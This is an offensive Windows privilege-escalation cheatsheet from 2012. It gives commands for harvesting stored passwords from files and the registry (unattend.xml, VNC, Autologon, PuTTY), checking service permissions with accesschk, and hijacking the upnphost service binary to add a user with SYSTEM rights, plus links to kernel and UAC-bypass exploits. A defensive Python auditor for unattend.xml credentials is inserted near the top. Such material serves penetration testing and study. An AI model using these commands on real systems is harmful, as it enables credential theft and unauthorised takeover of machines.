Windows Privilege Escalation - A Cheatsheet

This document provides a summary of techniques for Windows privilege escalation, including exploiting stored credentials, registry queries, insecure services, and vulnerabilities. It lists tools from Sysinternals, Metasploit, and other sources to help automate various steps. The purpose is to help speed up attacks and study of privilege escalation methods.
Windows Privilege Escalation - a cheatsheet

This is a work in progress. Additions, suggestions and constructive feedback are welcome.
The purpose of these cheatsheets is to, essentially, save time during an attack and study session.

Last modified: Fri Jul 20 12:20:34 EST 2012

Stored credentials
Search for credentials within:

c:\unattend.xml
Unattend credentials are stored as base64 of UTF-16LE text and can be decoded manually with base64 and iconv (the sample value below decodes to passwordPassword):
user@host $ echo 'cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=' | base64 -d | iconv -f UTF-16LE -t UTF-8
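For the defensive side of the same check, an added example (not part of the original cheatsheet) that audits an unattend.xml for leftover credentials: it walks the Password / AdministratorPassword elements, decodes the base64 UTF-16LE form and strips the trailing "Password" that Setup appends, so the encoded value above yields "password". The XML document is constructed for the example.

```python
import base64
import xml.etree.ElementTree as ET

NS = "{urn:schemas-microsoft-com:unattend}"   # namespace every unattend element carries

# Constructed sample in the element layout Windows Setup uses (values are
# made up; the encoded one is the string from the cheatsheet above).
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>Summer2012!</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>"""

def decode_unattend_value(value, plain_text):
    """Cleartext behind a <Value>.  Non-plaintext values are base64 of UTF-16LE
    text to which Setup appends the literal suffix "Password"."""
    if plain_text:
        return value
    text = base64.b64decode(value).decode("utf-16-le")
    return text[:-len("Password")] if text.endswith("Password") else text

def find_unattend_credentials(xml_text):
    """Return (element name, cleartext) for every credential left in the file."""
    hits = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag not in (NS + "Password", NS + "AdministratorPassword"):
            continue
        value, plain = elem.find(NS + "Value"), elem.find(NS + "PlainText")
        if value is None or not value.text:
            continue
        is_plain = plain is not None and (plain.text or "").strip().lower() == "true"
        hits.append((elem.tag[len(NS):], decode_unattend_value(value.text.strip(), is_plain)))
    return hits
```

Any non-empty result means the file still carries credential material and should be removed or scrubbed from the image.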

Metasploit Framework enum_unattend module and gather credentials module:


http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb

c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /i vnc.ini

findstr /si password *.txt *.xml *.ini

findstr /si pass *.txt *.xml *.ini

Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
http://www.nirsoft.net/password_recovery_tools.html
Dumping cleartext credentials with mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html

------------------------------------------------------------------------------------------------------
Query the Windows Registry

VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows Autologin: 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

SNMP Parameters:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

PuTTY clear text proxy credentials:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Search the registry - copy (pipe)  to the clipboard (optional)


reg query HKLM /f password /t REG_SZ /s [| clip]
reg query HKCU /f password /t REG_SZ /s [| clip]

------------------------------------------------------------------------------------------------------
Insecure GUI apps
running as SYSTEM that can open cmd.exe or browse directories (files, logfiles, etc.)

------------------------------------------------------------------------------------------------------
Directory permissions
cacls (legacy) and icacls - list and check ACLs on directories and files:
cacls
icacls

------------------------------------------------------------------------------------------------------
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027

Services pointing to writeable locations


*- orphaned installs - applications no longer installed that are still referenced from startup entries
*- replacing unknown DLLs
*- PATH directories with weak permissions - are overwrites possible?

Sysinternals accesschk - show which accounts have write access to each service (-u suppress errors, -w write access, -c services, -q no banner, -v verbose):
accesschk.exe -uwcqv *

*- unsecured processes
*- steal process/thread tokens (à la incognito)
*- hijack handles for write access

------------------------------------------------------------------------------------------------------
Change the upnp service binary
http://lanmaster53.com

sc qc upnphost
sc config upnphost binpath= "net user <username> /add"

sc config upnphost obj= ".\LocalSystem" password= ""
net stop upnphost
net start upnphost

May work with other services if permissions permit


------------------------------------------------------------------------------------------------------
Vulnerability Privilege Escalation

Windows kernel privilege escalation


KiTrap0D 
http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

Tomcat Windows privilege escalation


http://www.abysssec.com/blog/2008/11/27/tomcat-jrun-privilege-escalation-windows

NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3


Exploit-DB 16262 (platforms/windows/dos/16262.): "MS11-011 (CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC", 2011-03-01, Nikita Tarakanov, windows, dos
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx

Service Tracing Key (MS10-059)


http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554

Registry Symlink Vuln (MS10-021)


No public exploit - VUPEN membership only

Ryujin - afd.sys priv esc - MS11-080


http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/

UAC Bypass priv esc


http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info

Additional references, sources and other links:


Encyclopaedia of Windows Privilege Escalation - Brett Moore
http://www.ruxcon.org.au/2011-talks/encyclopaedia-of-windows-privilege-escalation/
